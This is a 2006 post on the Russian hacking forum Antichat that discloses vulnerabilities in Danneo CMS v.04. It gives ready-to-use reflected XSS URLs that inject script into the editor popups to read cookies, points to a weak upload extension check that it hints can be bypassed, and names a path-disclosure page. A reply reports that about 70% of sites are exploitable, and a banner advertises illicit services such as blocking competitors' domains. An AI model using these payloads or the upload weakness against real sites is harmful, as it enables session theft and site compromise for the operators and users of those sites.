Многочисленные уязвимости Danneo CMS

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Многочисленные уязвимости Danneo CMS

Опции темы

Поиск в этой теме

Опции просмотра

Многочисленные уязвимости Danneo CMS

22.04.2006, 09:12

vectorg

Постоянный

Регистрация: 07.08.2005

Сообщений: 386

С нами: 10925666

Репутация: 454

Многочисленные уязвимости Danneo CMS

DanneoCMS v.04
_http://danneo.com

1. xxs - куки

http://danneosite.com/apanel/editor/img_popup.php?img_url=%22%3E%3Cscript%3Ealert(docu ment.cookie)%3C/script%3E

http://danneosite.com/apanel/editor/file_popup.php?img_url=%22%3E%3Cscript%3Ealert(doc ument.cookie)%3C/script%3E

2. заливка файлов

http://danneosite.com/apanel/editor/...mg_library.php

защита слабенькая:

http://danneosite.com/apanel/editor/...rol.config.php -->

PHP код:


		
			
// allowed extentions for uploaded image files

$spaw_valid_imgs = array('gif', 'jpg', 'jpeg', 'png');

думайте сами =))

3. раскрытие путей

их много, самое простейшее:

http://danneosite.com/apanel/editor/scripts/demo.php

Antichat.ru © VectorG

𝕏 Twitter Reddit Telegram Копировать ссылку

22.04.2006, 19:05

kot777

Seo Pozitive

Регистрация: 13.08.2004

Сообщений: 779

С нами: 11442626

Репутация: 1635

Хорошо поработал, насколько массова уязвимость?

__________________
ICQ 328498627

Хочешь Элитный OpenVPN за 10 у.е ?

23.04.2006, 16:38

vectorg

Постоянный

Регистрация: 07.08.2005

Сообщений: 386

С нами: 10925666

Репутация: 454

пробив 70%
некоторые доступ к едитору закрывают

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Reviews CMS	w3r3.w01f	PHP	33	12.04.2010 23:18
Девять Комерческих Cms	w3r3.w01f	PHP	1	21.04.2006 00:27
Действующие уязвимости почтовых систем РФ	Maxmen	Уязвимости Mail-сервис	16	12.12.2004 16:48
Взлом wmshop	Xalegi	Уязвимости	0	29.11.2004 01:44

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules